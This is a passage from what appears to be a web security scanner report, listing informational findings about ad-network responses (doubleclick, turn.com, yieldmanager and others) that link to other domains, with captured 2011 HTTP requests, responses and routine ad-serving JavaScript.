Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 313
Date: Sun, 04 Sep 2011 00:48:49 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/m;240490578;0-0;1;46669306;3634-24/24;41913949/41931736/1;;~aopt=2/2/95/0;~sscs=%3fhttp://www.meebo.com/blank.html"><img src="http://www.meebo.com/skin/beta/img/blank.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.4. http://ad.doubleclick.net/adj/uap.reuters/uap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uap.reuters/uap

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adj/uap.reuters/uap;site=uap;sect=reuters;!c=reuterspm=1;xa=n;pos=1;tile=1;sz=728x90;ord=1433287? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 775
Date: Sun, 04 Sep 2011 00:47:51 GMT

document.write('');


var clickURL = new Array();
var myChannel = 1;
var flashURL = "http://sales.reuters.com/pitches/roughcuts/rc728x90.swf";
clickURL = "http://www.reuters.com/";
var gifURL = "http:
...[SNIP]...
rs.com/pitches/roughcuts/rc728x90.gif";
var giftag = "http://www.reuters.com/";

var flashQuery = '?clickTag=' + escape(clickURL);
flashQuery = flashQuery + "&channelName="+myChannel;

document.write('<iframe name="us" frameborder="0" border="0" width="728" height="90" src="http://www.reuters.com/assets/newsFlash?&flashPath='+flashURL+escape(flashQuery)+'&vcount=1&videoChannel='+myChannel+'&w=728&h=90&akamaize=n&gifPath='+escape(gifURL)+'&clickTag='+escape(giftag)+"\"frameborder='0' scrolling='no' style='overflow:hidden'></iframe>
...[SNIP]...

18.5. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26912047&ahcid=2168902&bimpd=_P8jnlWa9XstK_JlmmehibBCY86uUcZ8orSis2gk3CgGuM8NRppyPQMYvcwYVWxeqx53lV-injqapvMTqVcy93ETQudoxG65t8gPvD3_8uXTH1PXOPFQZu8QV_sfud_H-APXWDieQ47BkVHFFBn37s3aR3R9fKaUZJwqF3RKDtidgFaK5usOyzENC88rTUlt9K10asyG35OWlNfIYOZ-eD5tcSKw-zblptFUhK9YrBvJ-WVZmeLXwW90Vc9Kb9XoiPnsI1H5EzsiLAXyc7PFNmMqw1dLCgnGdMDgUmN3gwdG_Ur_2SMU4K10y_Sli8mM2o2RfArbjquS3LhtH_oucb3wc-cQ7FRKnITKYzO3zYXWG83x93SQchtOADUffiJhCEHm6r5PNXkH9qRXbUWExW_-Tu619iR6e1KbNlVj8jLndn3HHWXSm6j08SLj-h_ckdMj51v2x5gNhdpsMl_xftjg47NtKOd3aMYaFKX0mDx-mbKM0JHYn1hPNWK3mE7pzqC_aS7mkgsjA3S3GAANk8l2hYjwLveMS5-0Prm8ku-d-0Mgw9kibbpEMGHOE3HL6dCtmc69w_hrmFS4bSqF1Ubrzov4KJkplEjIfx4sijhgID_WtH2HGV-ZlBaxQA1ij1j_O9y58VxgD6JjAd6GfmoJ8UbwkKQyww1upyp3jn-KeGFWA05C4wMLlJET2Sr393OncBALoxLqvhLiy_Csz4BhnEKFF2M8my_fgvGuVC-BGn7V08Zk_msX51p9Pm_1V71_KFY8MHiZdUStS_Pc88kzr_aJ80D7tEUMLPW-_InB3ZbanTW1OTZfNoJuT_Q8bPiK77OYvzyO19oo0lS1JrBteXm6E3IqGkdPbGLUoEv66yPDCbC2aqvzIe2Oz4Dl&acp=1.72 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:06 GMT
Set-Cookie: uid=4447451951399893309; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=C5fpYpilMyxHrPIR--3QkiHvKDNi_uncK1CZ9qMjBiHJxmeG753N3cyfpzvDjP2CIQIVonNUzt8CzdLhUy1rOScdAv5WskG6P8YmJYM-cP7i3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:05 GMT
Content-Length: 9577


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n            \n    \n    \n\n\n\n\n\n\n        \n        \n    \n                \n            \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/;">\n</SCRIPT>
...[SNIP]...
<A HREF="http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/http://ad.doubleclick.net/jump/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2607056080429450331?">\n<IMG SRC="http://ad.doubleclick.net/ad/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2607056080429450331?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

18.6. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26912083&ahcid=2168938&bimpd=pCreIYJavyNiKT8OQHFCSnu-vORVAfADNWaIrVAJW9V1OJxo6MJDRlBTc3fVSGqORiXDRlomnL_mfAoVZXeCkL8wvAhJVp5vH1605NNaPKgd1x29xXl5OSgnSbh900QIFhYiHQW0teqBC570BVUfktff2qOd8TAuM1o70SLAMfwCKpFmO4iIlB0kM7YKTICsL7R4Llxu6gw1UDBG-W9xu9Cw1Mz4UX51ay3f8dUZrSSA7ScN_yzVCT_qn-_wh7GkjVBkWJOw8E0SsEBhkIDT30v0_tDzWZMCygX7uwRksdEjoCAUEtzyi3w02uZQh4CPlbbQCKaV1kCXC1z-_nrIRv3Dt_DOnJ6szh2BeUfdUcDG-dcfe7AZKpps-jRxx503w5ouEVi7AI_5bXPRNdcP8QFcyCrv21DOcZZtn_24bXnbuGlDBbzSoryu0WxJZt3-TbjA4JdW6zB8Hr71jKGygnf979g2SfUVLE2EEGA1_P18fHSjIFmLLv9mvWkjikr6tE1_pTGVcNndvBjk5O8WpORSUX8h57ktArQiQRf_VM7suSEszTFtXJTNBWjhIyl4HF2axn5veQQlnqlFyRkks1_f7KC3VLmRxk7zb_BZDIJlqbhnVBeCxCmDhdk0jNpMHiPyrAZz5UKLC_VL_S0H0uZu9JsuecfTkRFyKcv1KqxdXU0tBSOr2Azj03ZXjmB-xXJHA51HCyRbV39W-BZaYUYafA0sG2GU1QMSEGn7mGlP_0gfI5Dj0uZ98BGVjFp-ixyNrFPa4sCVYWwv6KsGYXxI4IYGMiYon4s4QKZwiq1HQL2uATEn9inEHrl7lClpZsz5pj9OB5Dloc6omzDygRQ_CVxmcL7l1mtL_HnfnUZw--1JIlgG4EVQJnxieWB1EvmONAwrRCaTz4lB29IygQ&acp=F2A40808BF222937&rtbacid=b955a540e6a0f13e962aa5535b75fe6909df734c HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771; fc=CP-kOX4iOSzQzmzsKgiCelsouvdm86lAqkJC4JDCvS1ZP8p8LWiVlYWj8mwoyMJnM74tT5yNflT44pP1rbQUdr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:29 GMT
Set-Cookie: uid=8397588332178697252; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:29 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=yKjiBNFeYaCqBQq9EKX_XuOtvx43KJO5Y8uCXkaobqPJxmeG753N3cyfpzvDjP2CWiAAKoJnCDlt6qAwGNpdjSA6EiGqn4ODhEiNrN01Etji3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:29 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:28 GMT
Content-Length: 10285


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n            \n    \n    \n\n\n\n\n\n\n        \n        \n    \n                \n            \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/;">\n</SCRIPT>
...[SNIP]...
<A HREF="http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/http://ad.doubleclick.net/jump/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=3730451366222604100?">\n<IMG SRC="http://ad.doubleclick.net/ad/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=3730451366222604100?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

18.7. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pixel?&id=1282674&id=1239839&id=1415271&id=950991&id=1198835&id=1283938&id=1416226&id=1361950&id=1342492&id=1250690&id=1224511&id=1364793&id=1364633&id=1187608&id=698998&id=1023063&id=1357445&id=1416227&id=939893&id=956404&id=1294447&id=1415270&id=1198834&id=1253950&id=1210932&id=1188217&id=956405&id=1398249&id=1320775&id=1050626&id=1349763&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; bh="b!!!!V!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^"

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:42 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!v!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!$=3GJ/!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!$=3GJ/!#RY.!!!!$=3GJ/!#SCj!!!!$=3GJ/!#SCk!!!!$=3GJ/!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!$=3GJ/!#aG>!!!!$=3GJ/!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!$=3GJ/!#tK$!!!!$=3GJ/!#ust!!!!$=3GJ/!#usu!!!!$=3GJ/!#v-#!!!!#=3*$x!#wW9!!!!$=3GJ/!#yM#!!!!$=3GJ/!$#WA!!!!$=3GJ/!$%,!!!!!$=3GJ/!$%SB!!!!$=3GJ/!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!$=3GJ/!$*a0!!!!$=3GJ/!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!$=3GJ/!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!$=3GJ/!$1:.!!!!#=3!ea!$2j$!!!!$=3GJ/!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!$=3GJ/!$3y-!!!!'=2v<]!$4ou!!!!$=3GJ/!$5Nu!!!!$=3GJ/!$5oO!!!!$=3GJ/!$5qE!!!!$=3GJ/!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!$=3GJ/!$<DI!!!!#=3G@^!$=p7!!!!$=3GJ/!$=p8!!!!$=3GJ/!$>#M!!!!$=3GJ/!$>#N!!!!$=3GJ/"; path=/; expires=Tue, 03-Sep-2013 00:55:42 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:55:42 GMT
Pragma: no-cache
Content-Length: 660
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SETJCLC0lAIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=5n2yCJ3M-wEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SWqcCPC66QEQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=3CLYCPCM3AEQjPe59AM&guid=ON&script=0" />');

18.8. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.casalemedia.com
Path:   /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025 HTTP/1.1
Host: c.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSC=TmLJ3w**; CMDD=AAF1owE*; CMIMP=102679&1315097282; CMRUM2=04000000002925993182975414771; CMST=TmLJ305iyskD; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyskAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Location: http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 04 Sep 2011 00:48:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:48:11 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMS=65131&1314825471&95308&1314825468&102679&1315097055;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT
Set-Cookie: CMST=TmLJ305iyssE;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:48:11 GMT
Set-Cookie: CMD1=AAFehU5iyssAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025">here</a>
...[SNIP]...

18.9. http://cdn.optmd.com/V2/89733/235451/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/89733/235451/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: cdn.optmd.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 02 Sep 2011 20:55:36 GMT
ETag: "ce5613-1a3-4abfb95404200"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:52:58 GMT
Content-Length: 419
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Personal Creations</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62?mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/"></script>
<img src="http://i.casalemedia.com/imp.gif?c=89733&cr=235451" width="1" height="1" alt="" />
</body>
...[SNIP]...

18.10. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:47:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&amp;cver=1">here</A>
...[SNIP]...

18.11. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEJ1u_nXPeXgxS3LGeCpc9xE&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:48:08 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&amp;pid=18&amp;uid=CAESEJ1u_nXPeXgxS3LGeCpc9xE&amp;cver=1">here</A>
...[SNIP]...

18.12. http://cm.npc-mcclatchy.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

